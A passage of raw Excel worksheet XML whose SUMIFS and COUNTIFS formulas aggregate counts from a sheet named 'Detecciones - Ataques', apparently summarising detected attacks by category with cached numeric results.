        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*"))</f>
        <v>0.00119760479</v>
      </c>
      <c r="GE76" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY59)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY59 &amp; "*"))</f>
        <v>0.2</v>
      </c>
      <c r="GF76" s="480"/>
      <c r="GG76" s="480"/>
      <c r="GH76" s="480"/>
      <c r="GI76" s="480"/>
      <c r="GJ76" s="480"/>
      <c r="GK76" s="480"/>
      <c r="GL76" s="480"/>
      <c r="GM76" s="480"/>
      <c r="GN76" s="480"/>
      <c r="GO76" s="480"/>
      <c r="GP76" s="480"/>
      <c r="GQ76" s="480"/>
      <c r="GR76" s="480"/>
      <c r="GS76" s="480"/>
      <c r="GT76" s="480"/>
      <c r="GU76" s="480"/>
      <c r="GV76" s="480"/>
      <c r="GW76" s="480"/>
      <c r="GX76" s="480"/>
      <c r="GY76" s="480"/>
      <c r="GZ76" s="480"/>
      <c r="HA76" s="480"/>
      <c r="HB76" s="480"/>
      <c r="HC76" s="480"/>
      <c r="HD76" s="480"/>
      <c r="HE76" s="480"/>
      <c r="HF76" s="480"/>
      <c r="HG76" s="480"/>
      <c r="HH76" s="480"/>
      <c r="HI76" s="480"/>
      <c r="HJ76" s="480"/>
      <c r="HK76" s="480"/>
      <c r="HL76" s="480"/>
      <c r="HM76" s="480"/>
      <c r="HN76" s="480"/>
      <c r="HO76" s="480"/>
      <c r="HP76" s="480"/>
    </row>
    <row r="77">
      <c r="J77" s="277"/>
      <c r="K77" s="386" t="s">
        <v>2559</v>
      </c>
      <c r="L77" s="387" t="s">
        <v>2560</v>
      </c>
      <c r="M77" s="387" t="s">
        <v>2561</v>
      </c>
      <c r="N77" s="388" t="s">
        <v>2562</v>
      </c>
      <c r="O77" s="278"/>
      <c r="Q77" s="271"/>
      <c r="R77" s="352" t="s">
        <v>2547</v>
      </c>
      <c r="S77" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>3711</v>
      </c>
      <c r="T77" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>3177</v>
      </c>
      <c r="U77" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>168</v>
      </c>
      <c r="V77" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>54</v>
      </c>
      <c r="W77" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>14</v>
      </c>
      <c r="X77" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="Y77" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="Z77" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>152095</v>
      </c>
      <c r="AA77" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>26</v>
      </c>
      <c r="AB77" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>202</v>
      </c>
      <c r="AC77" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>29</v>
      </c>
      <c r="AD77" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>864</v>
      </c>
      <c r="AE77" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>8</v>
      </c>
      <c r="AF77" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>5989</v>
      </c>
      <c r="AG77" s="271"/>
      <c r="AH77" s="352" t="s">
        <v>2547</v>
      </c>
      <c r="AI77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>3702</v>
      </c>
      <c r="AJ77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>9</v>
      </c>
      <c r="AL77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>3177</v>
      </c>
      <c r="AN77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>162</v>
      </c>
      <c r="AR77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>1</v>
      </c>
      <c r="AS77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>0</v>
      </c>
      <c r="AU77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>3</v>
      </c>
      <c r="AV77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>38</v>
      </c>
      <c r="AY77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>2</v>
      </c>
      <c r="BA77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>14</v>
      </c>
      <c r="BB77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>0</v>
      </c>
      <c r="BD77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>0</v>
      </c>
      <c r="BI77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>19</v>
      </c>
      <c r="BL77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>149723</v>
      </c>
      <c r="BN77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>2371</v>
      </c>
      <c r="BO77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>12</v>
      </c>
      <c r="BT77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>2</v>
      </c>
      <c r="BU77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>0</v>
      </c>
      <c r="BZ77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>0</v>
      </c>
      <c r="CA77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>4</v>
      </c>
      <c r="CG77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>0</v>
      </c>
      <c r="CI77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>5</v>
      </c>
      <c r="CL77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>159</v>
      </c>
      <c r="CN77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>8</v>
      </c>
      <c r="CP77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>18</v>
      </c>
      <c r="CQ77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>3</v>
      </c>
      <c r="CR77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>851</v>
      </c>
      <c r="CT77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>2</v>
      </c>
      <c r="CU77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>11</v>
      </c>
      <c r="CY77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB77" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CZ3:$CZ139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC77" s="355">
